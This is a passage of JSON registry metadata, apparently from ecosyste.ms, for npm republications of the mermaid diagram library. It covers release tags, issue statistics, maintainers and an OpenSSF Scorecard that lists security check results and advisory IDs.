/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:50.515Z","dependent_packages_count":0,"downloads":0,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":37.52203935328121,"dependent_packages_count":54.858987213183816,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":46.19051328323251},"purl":"pkg:npm/%40sautejfi/mermaid","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@sautejfi/mermaid","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@sautejfi/mermaid","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@sautejfi/mermaid/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@sautejfi%2Fmermaid/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@sautejfi%2Fmermaid/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@sautejfi%2Fmermaid/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@sautejfi%2Fmermaid/related_packages","maintainers":[{"uuid":"sautejfi","login":"sautejfi","name":null,"email":"florian.sautejeau@gmail.com","url":null,"packages_count":4,"html_url":"https://www.npmjs.com/~sautejfi","role":null,"created_at":"2023-08-08T08:14:21.014Z","updated_at":"2023-08-08T08:14:21.014Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/sautejfi/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":7996749,"name":"@sautejfi/mermaid-monorepo","ecosystem":"npm","description":"Markdownish syntax for generating flowcharts, sequence diagrams, class diagrams, gantt charts and git graphs.","homepage":"https://github.com/mermaid-js/mermaid","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","flowchart","sequence diagram","gantt","class diagram","git graph"],"namespace":"sautejfi","versions_count":1,"first_release_published_at":"2023-07-27T12:28:29.234Z","latest_release_published_at":"2023-07-27T12:28:29.234Z","latest_release_number":"10.2.4","last_synced_at":"2025-09-01T12:55:57.453Z","created_at":"2023-07-27T12:30:09.707Z","updated_at":"2025-09-01T14:17:50.517Z","registry_url":"https://www.npmjs.com/package/@sautejfi/mermaid-monorepo","install_command":"npm install @sautejfi/mermaid-monorepo","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"10.2.4"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"h